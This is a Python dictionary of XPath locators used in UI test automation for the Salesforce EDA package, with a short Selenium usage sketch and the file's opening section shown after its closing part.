Account']/preceding-sibling::span", "account_checkbox": "//div[contains(@class,'slds-form-element__control')]//span[contains(text(),'{}')]", "save": "//button[contains(@class, 'slds-button')]/span[text()='Save']/..", "edit": "//button[contains(@class, 'slds-button')]/span[text()='Edit']/..", "cancel": "//button[contains(@class, 'slds-button')]/span[text()='Cancel']/..", }, "contact": { "new_button": "//a[@title='New']//div[@title='New']", "first_name": "//input[contains(@class,'firstName')]", "last_name": "//input[contains(@class,'lastName')]", "save_button": "//button[@title='Save']", "program_enrollment_new_button": "//div[contains(@class, 'windowViewMode-normal')]//span[text()='Program Enrollments']/following-sibling::span[@title='(0)']/ancestor::header/following-sibling::div/descendant::a[@title='New']", }, "program_plans": { "program_plan": "(//a[@title='Program Plans'])[2]/span/span", "new_button": "//a[@title='New']//div[@title='New']/..", "pp_name": "//div//div//div//div//div//div//div//label//span[contains(text(), 'Program Plan Name')]//../following-sibling::input", "save_button": "//div[contains(@class, 'inlineFooter')]/descendant::button[@title='Save']", }, "plan_requirement": { "error": "//div[contains(@class, 'pageLevelErrors')]/descendant::li[text()='{}']", "parent_plan_req_name": "//div[contains(@class, 'slds-modal__container')]/descendant::span[text()='Parent Plan Requirement']/../following-sibling::div/descendant::span[text()='{}']", "plan_requirement_name": "//div[contains(@class, 'slds-modal__container')]/descendant::span[text()='Plan Requirement Name']/../following-sibling::input", "program_plan_name": "//td/a[@title='{}']", "program_plan": "//div[contains(@class, 'slds-modal__container')]/descendant::span[text()='Program Plan']/../following-sibling::div/descendant::span[text()='{}']", "delete_field": "//div[contains(@class, 
'slds-modal__container')]/descendant::span[text()='{}']/../following-sibling::div/descendant::span[text()='{}']/following-sibling::a[@class='deleteAction']", "toast_message": "//lightning-icon[contains(@class, 'toastIcon') and contains(@class, 'slds-icon-utility-success')]", }, "course_offering": { "search_courses": "//div/input[@title='Search Courses']", "new_button": "//a[@title='New']//div[@title='New']/..", "new_course_button": "//span[@class='itemLabel slds-truncate slds-show--inline-block slds-m-left--xx-small' and contains(text(), 'New Course')]", "save_button": "(//span[@class=' label bBody' and text()='Save']/ancestor::button[contains(@class, 'slds-button')])[3]", "next_save_button": "//div[contains(@class, 'inlineFooter')]/descendant::button[@title='Save']", "final_save_button": "(//span[@class=' label bBody' and text()='Save'])[3]/ancestor::button", }, "settings_health_check": { "run_health_check_button": "//button[@title='{}']", "health_check_header": "//h2[contains(@class, 'header')]/span[text()='{}']", "last_run_date": "//button[@title='Run Health Check']/preceding::div[1]", "expand_button": "//button[@title='Expand these results' and contains(@aria-controls, '{}')]", "all_checks_status": "//div[text()='{}']/following-sibling::div/div[contains(@class, 'text')]", "status_value": "//div[contains(@id, '{}')]/descendant::td/descendant::lightning-base-formatted-text[text()='{}']/ancestor::td/preceding-sibling::th[@data-label='Status']/descendant::lightning-base-formatted-text", "recommended_fix_value": "//div[contains(@id, '{}')]/descendant::td/descendant::lightning-base-formatted-text[text()='{}']/ancestor::tr/descendant::td[@data-label='Recommended Fix']/descendant::lightning-base-formatted-text", }, "term": { "new_term_button": "//span[@class='itemLabel slds-truncate slds-show--inline-block slds-m-left--xx-small' and contains(text(), 'New Term')]//..", "save_button": "(//span[@class=' label bBody' and contains(text(), 'Save')])[5]/..", "account": "//div//input[@title='Search Accounts']", "search_terms": "//input[@title='Search Terms']", "course_offering_id": "//span[contains(text(), 'Course Offering ID')]//../following-sibling::input", }, "custom_settings": { "hierarchy_settings": "//a[text()='Hierarchy Settings']", "manage": "//span/input[@value='Manage']", "no_records": "//table//td[text()='No records to display.']", "custom_settings_frame": "//iframe[contains(@title,'Custom Settings ~ Salesforce')]", "custom_settings_definition": "//iframe[contains(@title,'Custom Setting Definition ~ Salesforce')]", "custom_settings_h_settings": "//iframe[contains(@title,'Custom Setting Hierarchy Settings ~ Salesforce')]", }, "new_account": "//span[@title='New Account']", "new_account_next_button": "//button[contains(@class, 'slds-button')]//span[@class=' label bBody' and text()='Next']", "new_account_name": "//label/span[text()='Account Name']/following-sibling::span/following::input[1]", "new_account_save_button": "//div[contains(@class, 'slds-modal__footer')]/descendant::button[@title='Save']", "account_record_type": "//span[contains(text(), '{}')]", "new_program_enrollment_save_button": "//div[contains(@class, 'inlineFooter')]/descendant::button[@title='Save']", "affiliated_accounts_count": "//span[text()='Affiliated Accounts']/following-sibling::span[contains(@title, '(1)')]", "custom_settings_title": "//a/mark[text()='{}']", "program_enrollments_count": "//span[text()='Program Enrollments']/following-sibling::span[contains(@title, '(1)')]", "programenrollment_account": 
"//div[@class='autocompleteWrapper slds-grow']//input[@class=' default input uiInput uiInputTextForAutocomplete uiInput--default uiInput--input uiInput uiAutocomplete uiInput--default uiInput--lookup']", "list_of_departments": "//button[contains(@class, 'slds-button slds-button--neutral')]//span[@class=' label bBody' and text()='Next']", "tab": "//div[@class='uiTabBar']/ul[@class='tabs__nav']/li[contains(@class,'uiTabItem')]/a[@class='tabHeader']/span[contains(text(), '{}')]", "account_list": '//tbody/tr/th[.//span[contains(@class, "slds-grid")]]/descendant::a[text()="{}"]', "header_field_value": '//*[contains(@class, "slds-page-header__detail")][.//*[@title="{}"]]//*[text()="{}"]', "modal": { "checkbox": '//div[contains(@class,"uiInputCheckbox")]/label/span[text()="{}"]/../following-sibling::input[@type="checkbox"]', "save": "//div[contains(@class, 'footer') or contains(@class, 'Footer')]/descendant::button[@title='Save']", }, "accounts_contacts_settings_locators": { "copy_from": "//select[@class='contact-preferred-phone-picklist-input-select select uiInput uiInputSelect uiInput--default uiInput--select']", "disable_checked": "(//span[text()='Disable Preferred Phone enforcement']/following::div/div/div/label/input/following-sibling::span)[1]", "disable_preferred_phone": "//div/span[text()='Disable Preferred Phone enforcement']/following::div[1]/div/div/label/span/img[@alt='False']", "enhanced_preferred_clear": "//div/span[text()='Enable Enhanced Preferred Phone Functionality']/following::div[1]/div/div/label/span/img[@alt='False']", "enhanced_preferred_clear_faux": "//span[text()='Enable Enhanced Preferred Phone Functionality']/following::div[1]/div/div/label/input/following::span[1]", "enhanced_preferred_set": "//span[text()='Enable Enhanced Preferred Phone Functionality']/following::div[1]/div/div/label/span/img[@alt='True']", "enhanced_preferred_set_faux": "//span[text()='Enable Enhanced Preferred Phone Functionality']/following::div[1]/div/div/label/input/following::span[1]", "preferred_phone_active": "//div/span[text()='Disable Preferred Phone enforcement']/following::div[1]/div/div/label/span/img[@alt='True']", }, "relationships_settings_locators": { "sub_tab": "//div[@id='relTabs']/descendant::li[contains(@class, 'slds-text-heading--label')]/a[text()='{}']", }, "contacts_locators": { "contact_save": "//div[contains(@class,'modal-footer')]//button[@title='Save']//span[text()='Save']", "header": "//a[@title='Contacts']//span", "select_contact": "//a[@title='{} {}']", "preferred_phone": "//span//span[contains(text(),'Preferred Phone')]", "preferred_phone_home_dropdown": "//span//span[contains(text(),'Preferred Phone')]/following::span/following::a", "preferred_tab": "//div[@class='select-options']/descendant::a[@title='Home Phone']", "phone_verify_has_number": "(//div//span[text()='Phone']/../following-sibling::div//span[not( text()='123-123-1234')])[1]", "preferred_error_message": "//li[contains(text(), 'The phone selected for Preferred Phone can')]", "which_preferred_error_message": "//li[contains(text(), 'Tell us which Phone is preferred.')]", "field_for_work_phone": "//div//label//span[contains(text(),'Work Phone')]/../following-sibling::input", "which_footer_cancel": "//div[contains(@class,'footer')]/button[@title='Cancel']//span[text()='Cancel']", "footer_save": "//div[contains(@class,'modal-footer')]//span[text()='Save']", "accounts_contacts": "//a[contains(text(),'Accounts and Contacts')]", "details_tab": "//div[contains(@class,'normal')]//span[@class='title' and 
text()='Details']", "phone_home": "//span[text()='Home Phone']/../following-sibling::input", "run_cleanup": "//button[text()='Run Cleanup']", "phone_verify": "//div//span[text()='Home Phone']/../following-sibling::div//span//span[text()='123-123-1234']", "home_phone_verify": "//span[text()='Home Phone']/../following::div//span//span[text()='123-123-1234']", "successful_run": "//span[text()='The process was queued successfully. An email will be sent at the completion of the job.']", "apex_jobs": "//a/mark[text()='{}']", "primary_business_organization": "(//span[text()='Primary Business Organization']/following::div/div/div/div/input[@title='Search Accounts'])[1]", "button_save_affiliation": "//button[@title='Save']//span[text()='Save']", "delete_icon": "//span[@class='deleteIcon']", }, "affiliations_locators": { "header": "//a[@title='EDA Settings']//span", "tab": "//div[@id='tabs']/descendant::li[contains(@class, 'slds-text-heading--label')]/a[text()='{}']", "edit": "//button[contains(@class, 'slds-button') and @type='button']/span[text()='Edit']/..", "checkbox": "//span[text()='{}']/../following-sibling::div/descendant::label[contains(@class,'slds-checkbox')]/span[contains(@class, 'slds-checkbox--faux')]", "save": "//div[contains(@class, 'slds-page-header')]/descendant::button[contains(@class, 'settings-save-bttn')]", "sub_tab": "//div[@id='afflTabs']/descendant::li[contains(@class, 'slds-text-heading--label')]/a[text()='{}']", "edit_button": "//div[@class='slds-button-group']//span[contains(text(), 'Edit')]", "save_button": "//div[@class='slds-button-group']//span[contains(text(), 'Save')]", "un_ert_validation": "//span/img[@class='affl-record-type-enforced unchecked' and @alt='False']", "un_delete_rec_affl": "//span/img[@class='delete-prog-enroll unchecked' and @alt='False']", "specify_role_for_c_affl": "(//div/div/span[text()='Specify Role for Created Affiliations']/following::span)[1]/img[@class='copy-start-date checked' and @alt='True']", "copy_affl_end_date": "//span/img[@class='copy-end-date checked' and @alt='True']", "copy_affl_start_date": "(//div/div/span[text()='Copy Affiliation Start Date from Program Enrollment']/following::span)[1]/img[@class='copy-start-date checked' and @alt='True']", "affiliations_former": "//div/div/following::div/span[text()='Former']", "affiliations_student": "(//div/div/span[@class='uiOutputText' and text()='Role Specified for Created Affiliations']/following::div[@class='slds-col slds-size--1-of-2'])[1]/span[text()='Student']", "affiliations_current": "//div/div/following::div[@class='slds-col slds-size--1-of-2']/span[text()='Current']", "account_record_type_academic_program": "//span[@class='mapping-acc-rec-type uiOutputText' and text()='Academic Program']", "contact_primary_affl_field_primary_academic_program": "//span[@class='mapping-affl-field uiOutputText' and text()='Primary Academic Program']", "auto_enroll_academic_program": "//div/span[text()='Primary Academic Program']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll checked' and @alt='True']", "auto_enrollment_edit_mode_status_academic_program": "(//span[text()='Primary Affl Field: Primary Academic Program']/../../../following-sibling::div/following-sibling::div/div/label/span[text()='Status: Current']/following::input)[1]", "ae_em_status_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-status input']", 
"auto_enrollment_edit_mode_role_academic_program": "(//span[text()='Primary Affl Field: Primary Academic Program']/../../../following-sibling::div/following-sibling::div/div/label/span[text()='Role: Student']/following::input)[1]", "ae_em_role_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-role input']", "auto_enrollment_read_mode_status_academic_program": "(//div/span[text()='Primary Academic Program']/../following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-status uiOutputText' and text()='Current']", "auto_enrollment_read_mode_role_academic_program": "(//div/span[text()='Primary Academic Program']/../following-sibling::div/following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-role uiOutputText' and text()='Student']", "account_record_type_business_organization": "//span[@class='mapping-acc-rec-type uiOutputText' and text()='Business Organization']", "contact_primary_affl_field_primary_business_organization": "//span[@class='mapping-affl-field uiOutputText' and text()='Primary Business Organization']", "auto_enroll_business_organization": "//div/span[text()='Primary Business Organization']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll unchecked' and @alt='False']", "ae_em_bo_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-acc-rec-type input']", "auto_enrollment_edit_mode_role_business_organization": "(//span[text()='Primary Affl Field: Primary Business Organization']/../../../following-sibling::div/following-sibling::div/following-sibling::div//span[text()='Role: ']/following::input)[1]", "ae_em_pbo_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-affl-field input']", "auto_enrollment_read_mode_status_business_organization": "(//div/span[text()='Primary Business Organization']/../following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-status uiOutputText' and text()='']", "ae_enroll_bo_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-status input']", "auto_enrollment_read_mode_role_business_organization": "(//div/span[text()='Primary Business Organization']/../following-sibling::div/following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-role uiOutputText' and text()='']", "ae_enroll_bo_status_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-role input']", "account_record_type_educational_institution": "//span[@class='mapping-acc-rec-type uiOutputText' and text()='Educational Institution']", "contact_primary_affl_field_primary_educational_institution": 
"//span[@class='mapping-affl-field uiOutputText' and text()='Primary Educational Institution']", "auto_enroll_educational_institution": "//div/span[text()='Primary Educational Institution']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll unchecked' and @alt='False']", "auto_enrollment_read_mode_status_educational_institution": "(//div/span[text()='Primary Educational Institution']/../following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-status uiOutputText' and text()='']", "auto_enrollment_read_mode_role_educational_institution": "(//div/span[text()='Primary Educational Institution']/../following-sibling::div/following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-role uiOutputText' and text()='']", "ei_art_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-acc-rec-type input']", "ei_cpaf_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-affl-field input']", "ei_aes_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-status input']", "ed_aer_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-role input']", "account_record_type_household_account": "//span[@class='mapping-acc-rec-type uiOutputText' and text()='Household Account']", "contact_primary_affl_field_primary_household": "//span[@class='mapping-affl-field uiOutputText' and text()='Primary Household']", "auto_enroll_household_account": "//div/span[text()='Primary Household']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll unchecked' and @alt='False']", "auto_enrollment_read_mode_status_household_account": "(//div/span[text()='Primary Household']/../following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-status uiOutputText' and text()='']", "auto_enrollment_read_mode_role_household_account": "(//div/span[text()='Primary Household']/../following-sibling::div/following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-role uiOutputText' and text()='']", "ha_art_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid 
slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-acc-rec-type input']", "ha_cpaf_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-affl-field input']", "ha_aes_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-status input']", "ha_aer_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-role input']", "account_record_type_sports_organization": "//span[@class='mapping-acc-rec-type uiOutputText' and text()='Sports Organization']", "contact_primary_affl_field_primary_sports_organization": "//span[@class='mapping-affl-field uiOutputText' and text()='Primary Sports Organization']", "auto_enroll_sports_organization": "//div/span[text()='Primary Sports Organization']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll unchecked' and @alt='False']", "auto_enrollment_read_mode_status_sports_organization": "(//div/span[text()='Primary Sports Organization']/../following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-status uiOutputText' and text()='']", "auto_enrollment_read_mode_role_sports_organization": "(//div/span[text()='Primary Sports Organization']/../following-sibling::div/following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-role uiOutputText' and text()='']", "so_art_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-acc-rec-type input']", "pso_cpaf_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid 
slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-affl-field input']", "so_aes_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-status input']", "so_aer_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-role input']", "account_record_type_university_department": "//span[@class='mapping-acc-rec-type uiOutputText' and text()='University Department']", "contact_primary_affl_field_primary_department": "//span[@class='mapping-affl-field uiOutputText' and text()='Primary Department']", "auto_enroll_university_department": "//div/span[text()='Primary Department']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll unchecked' and @alt='False']", "auto_enrollment_read_mode_status_university_department": "(//div/span[text()='Primary Department']/../following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-status uiOutputText' and text()='']", "auto_enrollment_read_mode_role_university_department": "(//div/span[text()='Primary Department']/../following-sibling::div/following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-role uiOutputText' and text()='']", "ud_art_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-acc-rec-type input']", "ud_cpaf_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid 
slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-affl-field input']", "ud_aes_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-status input']", "ud_aer_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-role input']", "account_record_type_input": "//label/span[text()='Account Record Type']/../following-sibling::input", "primary_affl_field_input": "//label/span[text()='Primary Affl Field']/../following-sibling::input", "auto_enrollment": "(//label/span[text()='Auto-Enrollment']/following::br/following::div/label/input/following-sibling::span)[1][@class='slds-checkbox--faux']", "status_mapping_field_input": "//label/span[text()='Status']/../following-sibling::input", "role_mapping_field_input": "//label/span[text()='Role']/../following-sibling::input", "acc_record_type": "//label/span[text()='Acc Record Type: {}']/following::input[1][@class='mapping-acc-rec-type input' and @type='text']", "contact_primary_affl_field": "//label/span[text()='Primary Affl Field: {}']/following::input[1][@class='mapping-affl-field input' and @type='text']", "art_ap_input_affl_empty": "(//label/span[text()='Acc Record Type: ']/following::input[1][@class='mapping-acc-rec-type input' and @type='text'])[1]", "paf_pap_input_affl_empty": "(//label/span[text()='Primary Affl Field: ']/following::input[1][@class='mapping-affl-field input' and @type='text'])[1]", } }
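The dictionary above is a set of templated XPath locators whose "{}" placeholders are filled in at runtime. Below is a minimal, hedged sketch of how such templates are typically consumed with Selenium; the helper name find_by_locator, the driver setup, the placeholder URL, and the example labels ("Contacts", "Default Account Model", "Administrative") are illustrative assumptions and not part of the source file — only the eda_lex_locators keys and their "{}" placeholders come from the dictionary itself.

from selenium import webdriver
from selenium.webdriver.common.by import By


def find_by_locator(driver, template, *values):
    """Fill a templated XPath locator via str.format() and return the matching element."""
    xpath = template.format(*values)
    return driver.find_element(By.XPATH, xpath)


# Driver setup and URL are placeholders for illustration only.
driver = webdriver.Chrome()
driver.get("https://login.salesforce.com")

# Single-placeholder locator: the "tabs" -> "tab" template takes one tab label.
contacts_tab = find_by_locator(driver, eda_lex_locators["tabs"]["tab"], "Contacts")
contacts_tab.click()

# Two-placeholder locator: "eda_settings_new" -> "settings_dropdown" takes a field
# label and the option text; both values here are assumed examples.
option = find_by_locator(
    driver,
    eda_lex_locators["eda_settings_new"]["settings_dropdown"],
    "Default Account Model",
    "Administrative",
)
option.click()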
123.407229
692
0.674484
""" Locators for Spring '22 """ eda_lex_locators = { "app_tile": "//one-app-launcher-modal//one-app-launcher-app-tile//a[.='{}']", "app_item": "//a[@data-label='{}']", "frame": "//iframe[contains(@id, '{}') or contains(@title, '{}') or contains(@name, '{}')]", "input_placeholder": "//input[contains(@placeholder,'{}')]", "panel_tab_lookup": "//a/span[text()='{}']", "toast_message": "//div[@id='successToast']/descendant::h2[text()='{}']", "success_message": "//div[@id='successToast']/descendant::h2[text()='{}']", "toast_close": "//div[@id='successToast']/descendant::button[contains(@class, 'slds-notify__close')]", "close_tab": "//*[@data-key='close']/ancestor::button[contains(@class, 'slds-button slds-button_icon-x-small')]", "mailing_address": "//*[contains(@placeholder,'{}')]", "record": { "actions": "//div[contains(@class, 'actionsContainer')]/descendant::a[@title='{}']", "button": "//div[@class='actionsContainer']/button[@title='{}']", "datepicker": "//div[contains(@class,'uiDatePickerGrid')]/table[@class='calGrid']//span[text()='{}']", "edit_button": '//*[@title="{}"]', "list": "//div[contains(@class,'forcePageBlockItem')]//div//div//div//span//span[contains(text(), 'Primary Address Type')]/../../div/div/div/div/a[@class='select']", "related": { "new": "//div[@class='container']/descendant::div[contains(@class, 'slds-card__header')]/header/descendant::span[text()='{}']/ancestor::header/following-sibling::div/descendant::a[@title='New']", "title": "//span[@title='{}']", }, }, "tabs": { "tab": "//div[@class='uiTabBar']/ul[@class='tabs__nav']/li[contains(@class,'uiTabItem')]/a[@class='tabHeader']/span[contains(text(), '{}')]", "spl-tab": "//div[@class='slds-tabs_default']//ul[@class='slds-tabs_default__nav']/li[contains(@class,'slds-tabs_default__item')]/a[text()= '{}']", }, "eda_setup": { "custom_settings": "//a[text()='{}']", "settings_action_button": "//input[@type='submit' and @value='{}']", "setup_owner": "//table[@class='list']/descendant::td", }, "eda_settings": { "action": "//div[@role='banner']/descendant::button[contains(@class, 'settings-{}-bttn')]", "edit": "//div[@class='slds-page-header' and @role='banner']/descendant::span[text()='Edit']/parent::button", "tab": "//div[@id='tabs']/descendant::li[contains(@class, 'slds-text-heading--label')]/a[text()='{}']", "checkbox_default": "//span[text()='{}']/../following-sibling::div/descendant::img", "checkbox": "//span[text()='{}']/../following-sibling::div/descendant::label[contains(@class,'slds-checkbox')]/span[contains(@class, 'slds-checkbox--faux')]", "save": "//div[contains(@class, 'slds-page-header')]/descendant::button[contains(@class, 'settings-save-bttn')]", "system_tab": "//a[contains(text(),'System')]", "affiliations_tab": "//a[contains(text(),'Affiliations')]", "affiliations_check": "//span[text()='Specify Role for Created Affiliations']/../following-sibling::div/div/div/label/span/img[@class = 'copy-start-date checked' and @alt='True']", "auto_enroll_business_organization": "//div/span[text()='Primary Business Organization']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll checked' and @alt='True']", "auto_enroll_educational_institution": "//div/span[text()='Primary Educational Institution']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll checked' and @alt='True']", "auto_enroll_household_account": "//div/span[text()='Primary Household']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll checked' and @alt='True']", "auto_enroll_sports_organization": 
"//div/span[text()='Primary Sports Organization']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll checked' and @alt='True']", "auto_enroll_university_department": "//div/span[text()='Primary Department']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll checked' and @alt='True']", "primary_affl_unchecked": "//div/span[text()='{}']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll unchecked' and @alt='False']", "checkbox_ap_affl": "(//label[@class='slds-checkbox']/input[@class='mapping-auto-enroll uiInput uiInputCheckbox uiInput--default uiInput--checkbox'])[1]/following-sibling::span[@class='slds-checkbox--faux']", "primary_affl_edit": "(//label/span[text()='Primary Affl Field: {}']/../../../following-sibling::div/div/div/label)[1]/input/following-sibling::span[@class='slds-checkbox--faux']", "affiliations_role_checkbox": "//input[@class='copy-start-date uiInput uiInputCheckbox uiInput--default uiInput--checkbox']/following-sibling::span", "affiliation_mappings_tab": "//a[contains(text(), 'Affiliation Mappings')]", "courses": "//a[contains(text(),'Courses')]", "duration": "//div[.//span[text()='Duration'] and contains(@class, 'slds-form-element') ]//select//option[@value='60']", "hh_naming_check": "//input[@class='automatic-hh-acc uiInput uiInputCheckbox uiInput--default uiInput--checkbox']/following-sibling::span", "hh_naming_role_checkbox": "//select[@class='admin-account-naming-input-select select uiInput uiInputSelect uiInput--default uiInput--select']//option[@value='{{!{{!FirstName}}}} {{!LastName}} Administrative Account']", "hh_adminfnamelname": "//input[contains(@class,'firstName')]", "course_connections_tab": "//a[contains(text(),'Course Connections')]", "cc_checkbox": "//input[contains(@class,'slds-checkbox')]/parent::label", "student_select": "//select[contains(@class,'student-course-connection-record-type-input-select')]", "faculty_select": "//select[contains(@class,'faculty-course-connection-record-type-input-select')]", "status_student_affl": "//select[contains(@class,'affiliation-role-picklist-input-select')]", "status_spec_affl_not_deleted_former": "//select[contains(@class,'affiliation-status-delete-picklist-input-select')]", "status_current_picklist_affl": "//select[contains(@class,'affiliation-status-picklist-input-select')]", "default_account_model": "//span[text()='Default Account Model']", "store_errors": "//span[text()='Store Errors']", "send_error_notifications": "//span[text()='Send Error Notifications']", "error_notification_recipients": "//span[text()='Error Notification Recipients']", "disable_error_handling": "//span[text()='Disable Error Handling']", "automatic_household_naming": "//span[text()='Automatic Household Naming']", "adminstrative_account_name_format": "//span[text()='Administrative Account Name Format']", "household_account_name_format": "//span[text()='Household Account Name Format']", "batch_processing": "(//td/following-sibling::td[text()='Batch Apex']/following-sibling::td[text()='Processing'])[1]", "just_batch": "(//td/following-sibling::td[text()='Batch Apex'])[1]", "batch_watch": "(//td/following-sibling::td[text()='Batch Apex']/following-sibling::td)[1]", "wait_frame": "//iframe[contains(@title,'Apex Jobs ~ Salesforce - Developer Edition')]", "wait_loc_text": "(//td/following-sibling::td[text()='Batch Apex']/following-sibling::td)[1]", "new_account": "//span[@title='New Account']", "affiliated_accounts": "//span[@title='Affiliated Accounts']", "affiliation_match": 
